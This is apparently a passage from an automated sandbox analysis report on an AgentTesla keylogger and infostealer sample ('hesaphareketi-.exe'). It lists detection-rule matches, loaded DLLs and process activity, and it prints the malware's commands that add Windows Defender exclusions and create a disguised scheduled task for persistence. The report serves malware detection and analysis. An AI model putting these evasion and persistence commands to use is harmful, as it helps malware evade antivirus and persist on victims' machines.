                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeCode function: 9_2_04BA724A9_2_04BA724A
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeCode function: 9_2_04BA83D19_2_04BA83D1
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeCode function: 9_2_04D4C3E79_2_04D4C3E7
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeCode function: 9_2_04D4B6B09_2_04D4B6B0
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeCode function: 9_2_04D483C89_2_04D483C8
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeCode function: 9_2_04D4EFF89_2_04D4EFF8
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeCode function: 13_2_0113419013_2_01134190
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeCode function: 13_2_01134A6013_2_01134A60
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeCode function: 13_2_0113CF0013_2_0113CF00
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeCode function: 13_2_01133E4813_2_01133E48
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeCode function: 13_2_0113BE7613_2_0113BE76
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeCode function: 13_2_05FABCD013_2_05FABCD0
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeCode function: 13_2_05FA3F2813_2_05FA3F28
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeCode function: 13_2_05FA2EF813_2_05FA2EF8
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeCode function: 13_2_05FA56B813_2_05FA56B8
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeCode function: 13_2_05FA004013_2_05FA0040
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeCode function: 13_2_05FADBF013_2_05FADBF0
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeCode function: 13_2_05FA8B6213_2_05FA8B62
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeCode function: 13_2_05FA4FD813_2_05FA4FD8
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeCode function: 13_2_05FA361F13_2_05FA361F
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeCode function: 13_2_06943F9813_2_06943F98
                    Source: hesaphareketi-.exe, 00000000.00000002.2074474025.0000000004CE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs hesaphareketi-.exe
                    Source: hesaphareketi-.exe, 00000000.00000002.2069027456.000000000360D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs hesaphareketi-.exe
                    Source: hesaphareketi-.exe, 00000000.00000002.2069027456.0000000003474000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamef7121708-72dc-44f1-ae95-b037bc906047.exe4 vs hesaphareketi-.exe
                    Source: hesaphareketi-.exe, 00000000.00000002.2081297927.0000000006020000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs hesaphareketi-.exe
                    Source: hesaphareketi-.exe, 00000000.00000002.2067164468.000000000246B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamef7121708-72dc-44f1-ae95-b037bc906047.exe4 vs hesaphareketi-.exe
                    Source: hesaphareketi-.exe, 00000000.00000002.2056757452.000000000070E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs hesaphareketi-.exe
                    Source: hesaphareketi-.exe, 00000008.00000002.4487969528.0000000000403000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamef7121708-72dc-44f1-ae95-b037bc906047.exe4 vs hesaphareketi-.exe
                    Source: hesaphareketi-.exe, 00000008.00000002.4488225500.00000000010F9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs hesaphareketi-.exe
                    Source: hesaphareketi-.exeBinary or memory string: OriginalFilenamellvZ.exeL vs hesaphareketi-.exe
                    Source: hesaphareketi-.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: 0.2.hesaphareketi-.exe.3474e08.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.hesaphareketi-.exe.3474e08.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 9.2.xyodEPhulIrkY.exe.3645378.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 9.2.xyodEPhulIrkY.exe.3645378.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.hesaphareketi-.exe.34af428.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.hesaphareketi-.exe.34af428.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 8.2.hesaphareketi-.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 8.2.hesaphareketi-.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 9.2.xyodEPhulIrkY.exe.367f998.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 9.2.xyodEPhulIrkY.exe.367f998.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.hesaphareketi-.exe.34af428.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.hesaphareketi-.exe.34af428.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 9.2.xyodEPhulIrkY.exe.367f998.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 9.2.xyodEPhulIrkY.exe.367f998.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 9.2.xyodEPhulIrkY.exe.3645378.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 9.2.xyodEPhulIrkY.exe.3645378.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.hesaphareketi-.exe.3474e08.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.hesaphareketi-.exe.3474e08.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: hesaphareketi-.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: xyodEPhulIrkY.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.hesaphareketi-.exe.3474e08.0.raw.unpack, ekKu0.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.hesaphareketi-.exe.3474e08.0.raw.unpack, vKf1z6NvS.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.hesaphareketi-.exe.3474e08.0.raw.unpack, ZNAvlD7qmXc.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                    Source: 0.2.hesaphareketi-.exe.3474e08.0.raw.unpack, U2doU2.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.hesaphareketi-.exe.3474e08.0.raw.unpack, BgffYko.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.hesaphareketi-.exe.3474e08.0.raw.unpack, HrTdA63.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.hesaphareketi-.exe.3474e08.0.raw.unpack, Vvp22TrBv9g.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.hesaphareketi-.exe.3474e08.0.raw.unpack, Vvp22TrBv9g.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.hesaphareketi-.exe.3474e08.0.raw.unpack, Vvp22TrBv9g.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.hesaphareketi-.exe.3474e08.0.raw.unpack, Vvp22TrBv9g.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, F20LWFVHgRjD1hgb3j.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, F20LWFVHgRjD1hgb3j.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, F20LWFVHgRjD1hgb3j.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, rOmyU17JDH9qSUKV5w.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@19/15@1/1
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeFile created: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3668:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeMutant created: \Sessions\1\BaseNamedObjects\sENXcdAoQRSnuXnopTyHILpEwDv
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5148:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4092:120:WilError_03
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeFile created: C:\Users\user\AppData\Local\Temp\tmpE555.tmpJump to behavior
                    Source: hesaphareketi-.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: hesaphareketi-.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: hesaphareketi-.exeReversingLabs: Detection: 52%
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeFile read: C:\Users\user\Desktop\hesaphareketi-.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\hesaphareketi-.exe "C:\Users\user\Desktop\hesaphareketi-.exe"
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xyodEPhulIrkY" /XML "C:\Users\user\AppData\Local\Temp\tmpE555.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess created: C:\Users\user\Desktop\hesaphareketi-.exe "C:\Users\user\Desktop\hesaphareketi-.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xyodEPhulIrkY" /XML "C:\Users\user\AppData\Local\Temp\tmpBF7D.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess created: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe "C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe"
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xyodEPhulIrkY" /XML "C:\Users\user\AppData\Local\Temp\tmpE555.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess created: C:\Users\user\Desktop\hesaphareketi-.exe "C:\Users\user\Desktop\hesaphareketi-.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xyodEPhulIrkY" /XML "C:\Users\user\AppData\Local\Temp\tmpBF7D.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess created: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe "C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
